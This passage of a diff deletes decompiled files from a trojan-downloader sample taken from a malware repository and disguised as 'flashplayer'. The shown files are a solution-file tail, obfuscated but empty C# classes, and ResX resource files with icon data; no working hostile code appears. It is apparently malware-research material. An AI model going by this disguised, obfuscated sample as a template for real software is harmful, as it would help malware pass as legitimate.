{035B7341-C5D9-4725-9EEE-18E077452284}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
|
||||||
{035B7341-C5D9-4725-9EEE-18E077452284}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
|
||||||
{035B7341-C5D9-4725-9EEE-18E077452284}.Release|Any CPU.Build.0 = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
|
||||||
HideSolutionNode = FALSE
|
|
||||||
EndGlobalSection
|
|
||||||
EndGlobal
|
|
@ -1,9 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: <Module>{D2334828-51A8-42F0-A821-BA0ED2025206}
|
|
||||||
// Assembly: flashplayer, Version=11.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 06BDE18B-52D6-4D54-8321-212AE21F05B1
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.exe
|
|
||||||
|
|
||||||
internal class \u003CModule\u003E\u007BD2334828\u002D51A8\u002D42F0\u002DA821\u002DBA0ED2025206\u007D
|
|
||||||
{
|
|
||||||
}
|
|
@ -1,25 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: aCAxGo8jUjXrWCMv1a.F6gnBCYuM3Gh9uSkf3
|
|
||||||
// Assembly: flashplayer, Version=11.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 06BDE18B-52D6-4D54-8321-212AE21F05B1
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.exe
|
|
||||||
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
|
|
||||||
namespace aCAxGo8jUjXrWCMv1a
|
|
||||||
{
|
|
||||||
internal class F6gnBCYuM3Gh9uSkf3
|
|
||||||
{
|
|
||||||
private static bool F6gOnBCuM;
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
internal static void c3FUJW0tbGb2O()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
public F6gnBCYuM3Gh9uSkf3()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,123 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<root>
|
|
||||||
<!--
|
|
||||||
Microsoft ResX Schema
|
|
||||||
|
|
||||||
Version 2.0
|
|
||||||
|
|
||||||
The primary goals of this format is to allow a simple XML format
|
|
||||||
that is mostly human readable. The generation and parsing of the
|
|
||||||
various data types are done through the TypeConverter classes
|
|
||||||
associated with the data types.
|
|
||||||
|
|
||||||
Example:
|
|
||||||
|
|
||||||
... ado.net/XML headers & schema ...
|
|
||||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
|
||||||
<resheader name="version">2.0</resheader>
|
|
||||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
|
||||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
|
||||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
|
||||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
|
||||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
|
||||||
</data>
|
|
||||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
|
||||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
|
||||||
<comment>This is a comment</comment>
|
|
||||||
</data>
|
|
||||||
|
|
||||||
There are any number of "resheader" rows that contain simple
|
|
||||||
name/value pairs.
|
|
||||||
|
|
||||||
Each data row contains a name, and value. The row also contains a
|
|
||||||
type or mimetype. Type corresponds to a .NET class that support
|
|
||||||
text/value conversion through the TypeConverter architecture.
|
|
||||||
Classes that don't support this are serialized and stored with the
|
|
||||||
mimetype set.
|
|
||||||
|
|
||||||
The mimetype is used for serialized objects, and tells the
|
|
||||||
ResXResourceReader how to depersist the object. This is currently not
|
|
||||||
extensible. For a given mimetype the value must be set accordingly:
|
|
||||||
|
|
||||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
|
||||||
that the ResXResourceWriter will generate, however the reader can
|
|
||||||
read any of the formats listed below.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.binary.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.soap.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
|
||||||
value : The object must be serialized into a byte array
|
|
||||||
: using a System.ComponentModel.TypeConverter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
-->
|
|
||||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
|
||||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
|
||||||
<xsd:element name="root" msdata:IsDataSet="true">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:choice maxOccurs="unbounded">
|
|
||||||
<xsd:element name="metadata">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="assembly">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:attribute name="alias" type="xsd:string" />
|
|
||||||
<xsd:attribute name="name" type="xsd:string" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="data">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="resheader">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:choice>
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:schema>
|
|
||||||
<resheader name="resmimetype">
|
|
||||||
<value>text/microsoft-resx</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="version">
|
|
||||||
<value>2.0</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="reader">
|
|
||||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="writer">
|
|
||||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
<data name="$this.Icon" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5JY29uAgAAAAhJY29uRGF0YQhJY29uU2l6ZQcEAhNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAIAAAAJAwAAAAX8////E1N5c3RlbS5EcmF3aW5nLlNpemUCAAAABXdpZHRoBmhlaWdodAAACAgCAAAAAAAAAAAAAAAPAwAAAL4IAAACAAABAAEAICAAAAAAAACoCAAAFgAAACgAAAAgAAAAQAAAAAEACAAAAAAAgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhIKEAMbDxgD///8AvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQIBAAECAgICAgICAgICAgICAgICAgICAgICAgICAgICAgEAAQIEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAAAAAAAQABAgQEBAQEBAQEBAQEBAQEBAQEBAQCAgACAgACAgABAAECBAQEBAQEBAQEBAQEBAQEBAQEBAICAAICAAICAAEAAQIEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAQABAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//////////Cw==</value>
|
|
||||||
</data>
|
|
||||||
</root>
|
|
@ -1,154 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<root>
|
|
||||||
<!--
|
|
||||||
Microsoft ResX Schema
|
|
||||||
|
|
||||||
Version 2.0
|
|
||||||
|
|
||||||
The primary goals of this format is to allow a simple XML format
|
|
||||||
that is mostly human readable. The generation and parsing of the
|
|
||||||
various data types are done through the TypeConverter classes
|
|
||||||
associated with the data types.
|
|
||||||
|
|
||||||
Example:
|
|
||||||
|
|
||||||
... ado.net/XML headers & schema ...
|
|
||||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
|
||||||
<resheader name="version">2.0</resheader>
|
|
||||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
|
||||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
|
||||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
|
||||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
|
||||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
|
||||||
</data>
|
|
||||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
|
||||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
|
||||||
<comment>This is a comment</comment>
|
|
||||||
</data>
|
|
||||||
|
|
||||||
There are any number of "resheader" rows that contain simple
|
|
||||||
name/value pairs.
|
|
||||||
|
|
||||||
Each data row contains a name, and value. The row also contains a
|
|
||||||
type or mimetype. Type corresponds to a .NET class that support
|
|
||||||
text/value conversion through the TypeConverter architecture.
|
|
||||||
Classes that don't support this are serialized and stored with the
|
|
||||||
mimetype set.
|
|
||||||
|
|
||||||
The mimetype is used for serialized objects, and tells the
|
|
||||||
ResXResourceReader how to depersist the object. This is currently not
|
|
||||||
extensible. For a given mimetype the value must be set accordingly:
|
|
||||||
|
|
||||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
|
||||||
that the ResXResourceWriter will generate, however the reader can
|
|
||||||
read any of the formats listed below.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.binary.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.soap.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
|
||||||
value : The object must be serialized into a byte array
|
|
||||||
: using a System.ComponentModel.TypeConverter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
-->
|
|
||||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
|
||||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
|
||||||
<xsd:element name="root" msdata:IsDataSet="true">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:choice maxOccurs="unbounded">
|
|
||||||
<xsd:element name="metadata">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="assembly">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:attribute name="alias" type="xsd:string" />
|
|
||||||
<xsd:attribute name="name" type="xsd:string" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="data">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="resheader">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:choice>
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:schema>
|
|
||||||
<resheader name="resmimetype">
|
|
||||||
<value>text/microsoft-resx</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="version">
|
|
||||||
<value>2.0</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="reader">
|
|
||||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="writer">
|
|
||||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
<assembly alias="mscorlib" name="mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
|
|
||||||
<data name="$this.SnapToGrid" type="System.Boolean, mscorlib">
|
|
||||||
<value>True</value>
|
|
||||||
</data>
|
|
||||||
<data name="$this.TrayLargeIcon" type="System.Boolean, mscorlib">
|
|
||||||
<value>False</value>
|
|
||||||
</data>
|
|
||||||
<data name="$this.Icon" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5JY29uAgAAAAhJY29uRGF0YQhJY29uU2l6ZQcEAhNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAIAAAAJAwAAAAX8////E1N5c3RlbS5EcmF3aW5nLlNpemUCAAAABXdpZHRoBmhlaWdodAAACAgCAAAAAAAAAAAAAAAPAwAAAL4IAAACAAABAAEAICAAAAAAAACoCAAAFgAAACgAAAAgAAAAQAAAAAEACAAAAAAAgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhIKEAMbDxgD///8AvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwIBAAECAQMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgEAAQIBAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAQABAgEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQIBAAECAgICAgICAgICAgICAgICAgICAgICAgICAgICAgEAAQIEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAAAAAAAQABAgQEBAQEBAQEBAQEBAQEBAQEBAQCAgACAgACAgABAAECBAQEBAQEBAQEBAQEBAQEBAQEBAICAAICAAICAAEAAQIEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAQABAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//////////Cw==</value>
|
|
||||||
</data>
|
|
||||||
<data name="$this.Locked" type="System.Boolean, mscorlib">
|
|
||||||
<value>False</value>
|
|
||||||
</data>
|
|
||||||
<data name="$this.DrawGrid" type="System.Boolean, mscorlib">
|
|
||||||
<value>True</value>
|
|
||||||
</data>
|
|
||||||
<data name="progressBar1.Modifiers" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABgAAAL</value>
|
|
||||||
</data>
|
|
||||||
<data name="$this.Localizable" type="System.Boolean, mscorlib">
|
|
||||||
<value>False</value>
|
|
||||||
</data>
|
|
||||||
<data name="$this.Language" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
